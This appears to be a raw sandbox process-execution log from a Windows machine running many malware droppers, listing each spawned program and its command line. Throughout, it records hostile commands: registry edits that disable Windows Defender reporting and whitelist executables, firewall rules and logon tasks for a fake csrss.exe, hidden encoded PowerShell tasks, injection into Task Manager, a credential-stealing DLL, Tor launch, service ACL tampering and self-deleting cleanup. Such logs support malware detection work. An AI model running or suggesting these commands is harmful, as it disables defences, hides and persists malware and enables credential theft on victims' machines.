"C:\Windows\System32\regsvr32.exe" -u rMbC4.Q /S

C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe

"C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe"

C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe

"C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe"

C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe

"C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe"

C:\ProgramData\50543188494393494002.exe

"C:\ProgramData\50543188494393494002.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im FzbLA0y21wf4Eb_GXZGPAkPK.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe" & del C:\ProgramData\*.dll & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3244 -ip 3244

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 1928

C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe

"C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5800 -ip 5800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 1108

C:\Windows\SysWOW64\taskkill.exe

taskkill /im FzbLA0y21wf4Eb_GXZGPAkPK.exe /f

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon

C:\Windows\SysWOW64\timeout.exe

timeout /t 6

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\62eca45584\

C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe

"C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN bguuwe.exe /TR "C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe" /F

C:\Users\Admin\Pictures\Adobe Films\uw5KPJ6a18gzLPne_F5e0c1_.exe

"C:\Users\Admin\Pictures\Adobe Films\uw5KPJ6a18gzLPne_F5e0c1_.exe"

C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe

"C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe"

C:\Users\Admin\Pictures\Adobe Films\tmRoymsFOt7qgiIyaQJKTG0D.exe

"C:\Users\Admin\Pictures\Adobe Films\tmRoymsFOt7qgiIyaQJKTG0D.exe"

C:\Users\Admin\Pictures\Adobe Films\7oi_eeupjsnLrsVJ1cvYAxm7.exe

"C:\Users\Admin\Pictures\Adobe Films\7oi_eeupjsnLrsVJ1cvYAxm7.exe"

C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe

"C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe"

C:\Users\Admin\Pictures\Adobe Films\mNDcgp0zrWGy_iR_gqWvo4tt.exe

"C:\Users\Admin\Pictures\Adobe Films\mNDcgp0zrWGy_iR_gqWvo4tt.exe"

C:\Windows\SysWOW64\attrib.exe

attrib -?

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\62eca45584\

C:\Users\Admin\AppData\Local\Temp\Itvrzxmax2.exe

"C:\Users\Admin\AppData\Local\Temp\Itvrzxmax2.exe"

C:\Windows\SysWOW64\control.exe

"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",

C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe

"C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe" H

C:\Users\Admin\AppData\Local\Temp\7zSDD85.tmp\Install.exe

.\Install.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",

C:\Users\Admin\AppData\Local\Temp\7zSE536.tmp\Install.exe

.\Install.exe /S /site_id "525403"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3608 -ip 3608

C:\Users\Admin\AppData\Local\Temp\0B7121CH132B0JI.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 452

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 472 -p 5436 -ip 5436

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 5436 -s 708

C:\Windows\SysWOW64\cmd.exe

cmd /c cmd < Inebriarti.htm & ping -n 5 localhost

C:\Windows\SysWOW64\cmd.exe

cmd

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3608 -ip 3608

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 776

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 3608 -ip 3608

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 784

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 3608 -ip 3608

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 784

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5512 -ip 5512

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5512 -s 608

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3608 -ip 3608

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 824

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 3608 -ip 3608

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gHbFtyKwQ" /SC once /ST 00:21:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 984

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3608 -ip 3608

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 1012

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gHbFtyKwQ"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 3608 -ip 3608

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 1364

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "Ju38t3w5U8IOhBMX5rcSC6Nn.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe" & exit

C:\Windows\system32\RunDll32.exe

C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "Ju38t3w5U8IOhBMX5rcSC6Nn.exe" /f

C:\Users\Admin\AppData\Local\Temp\3A8A.exe

C:\Users\Admin\AppData\Local\Temp\3A8A.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 2476 -ip 2476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2476 -s 872

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAAwAA==

C:\Users\Admin\AppData\Local\Temp\4A1B.exe

C:\Users\Admin\AppData\Local\Temp\4A1B.exe

C:\Users\Admin\AppData\Local\Temp\4A1B.exe

C:\Users\Admin\AppData\Local\Temp\4A1B.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Users\Admin\AppData\Local\Temp\4A1B.exe

"C:\Users\Admin\AppData\Local\Temp\4A1B.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gHbFtyKwQ"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\110809d565579c\cred.dll, Main

C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\Admin\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\Admin\AppData\Local\Temp\csrss\tor\log.txt"

C:\Users\Admin\AppData\Local\Temp\4A1B.exe

"C:\Users\Admin\AppData\Local\Temp\4A1B.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bamNpdvhtkzLwlCraC" /SC once /ST 13:05:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\EdLqPAaTytMGRMX\SVjvbHJ.exe\" bH /site_id 525403 /S" /V1 /F

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Users\Admin\AppData\Local\Temp\jwzeqsilllyafcnn.exe

"C:\Users\Admin\AppData\Local\Temp\jwzeqsilllyafcnn.exe"

C:\Users\Admin\AppData\Local\Temp\6DF1.exe

C:\Users\Admin\AppData\Local\Temp\6DF1.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /tn COMSurrogate /f /sc onlogon /rl highest /tr "C:\Users\Admin\AppVerif\DllHelper.exe"

C:\Users\Admin\AppVerif\DllHelper.exe

"C:\Users\Admin\AppVerif\DllHelper.exe"

C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe

C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\Admin\Pictures\Adobe Films\HNYUwmuil6MtmEKe7lmDsMC3.exe"

C:\Users\Admin\AppData\Local\09dfb731-f846-4759-8506-2a169e20e63b\build2.exe

"C:\Users\Admin\AppData\Local\09dfb731-f846-4759-8506-2a169e20e63b\build2.exe"

C:\Users\Admin\AppData\Local\Temp\7BCD.exe

C:\Users\Admin\AppData\Local\Temp\7BCD.exe

C:\Users\Admin\AppData\Local\Temp\nijiccssjnaevyew.exe

"C:\Users\Admin\AppData\Local\Temp\nijiccssjnaevyew.exe"

C:\Users\Admin\AppData\Local\Temp\IHH9FGG6KIID6CG.exe

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Users\Admin\AppData\Local\Temp\8AF1.exe

C:\Users\Admin\AppData\Local\Temp\8AF1.exe

C:\Users\Admin\AppData\Local\09dfb731-f846-4759-8506-2a169e20e63b\build2.exe

"C:\Users\Admin\AppData\Local\09dfb731-f846-4759-8506-2a169e20e63b\build2.exe"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1

C:\Users\Admin\AppData\Local\Temp\987E.exe

C:\Users\Admin\AppData\Local\Temp\987E.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 2448 -ip 2448

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2448 -s 872

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 4404 -ip 4404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4404 -s 340

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\Temp\CE07.exe

C:\Users\Admin\AppData\Local\Temp\CE07.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"

C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Get-Variable.exe

"C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Get-Variable.exe"

C:\Windows\SysWOW64\schtasks.exe

/create /tn COMSurrogate /st 00:00 /du 9999:59 /sc once /ri 1 /f /tr "powershell.exe -windowstyle hidden"

C:\Users\Admin\AppData\Local\Temp\3A8A.exe

C:\Users\Admin\AppData\Local\Temp\3A8A.exe

C:\Users\Admin\AppData\Local\Temp\EF2C.exe

C:\Users\Admin\AppData\Local\Temp\EF2C.exe

C:\Users\Admin\AppData\Local\Temp\EF2C.exe

C:\Users\Admin\AppData\Local\Temp\EF2C.exe

C:\Users\Admin\AppData\Local\Temp\F576.exe

C:\Users\Admin\AppData\Local\Temp\F576.exe

C:\Windows\SysWOW64\tasklist.exe

tasklist /FI "imagename eq PSUAService.exe"

C:\Windows\SysWOW64\find.exe

find /I /N "psuaservice.exe"

C:\Users\Admin\AppData\Local\Temp\F7E8.exe

C:\Users\Admin\AppData\Local\Temp\F7E8.exe

C:\Users\Admin\AppData\Local\Temp\FB35.exe

C:\Users\Admin\AppData\Local\Temp\FB35.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe

"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 24408 -ip 24408

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 24408 -s 1132

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\findstr.exe

findstr /V /R "^DPPUlpMDoxxhVrUIPtlDSFKoNmARJTULbxHxsooLczeCBvhhRbTNaFvXtGiKJUTgAJQAcAsHWmomCiGsjjZjquaSYKfKqbwAmNeS$" Strette.htm

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif

Tal.exe.pif H

C:\Windows\SysWOW64\PING.EXE

ping localhost -n 5

C:\Windows\SysWOW64\tasklist.exe

tasklist /FI "imagename eq PSUAService.exe"

C:\Windows\SysWOW64\find.exe

find /I /N "psuaservice.exe"

C:\Windows\SysWOW64\findstr.exe

findstr /V /R "^DPPUlpMDoxxhVrUIPtlDSFKoNmARJTULbxHxsooLczeCBvhhRbTNaFvXtGiKJUTgAJQAcAsHWmomCiGsjjZjquaSYKfKqbwAmNeS$" Strette.htm

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif

Tal.exe.pif H

C:\Windows\SysWOW64\PING.EXE

ping localhost -n 5

C:\Windows\SysWOW64\PING.EXE

ping -n 5 localhost

C:\Windows\SysWOW64\PING.EXE

ping -n 5 localhost

C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\EdLqPAaTytMGRMX\SVjvbHJ.exe

C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\EdLqPAaTytMGRMX\SVjvbHJ.exe bH /site_id 525403 /S

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -windowstyle hidden

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

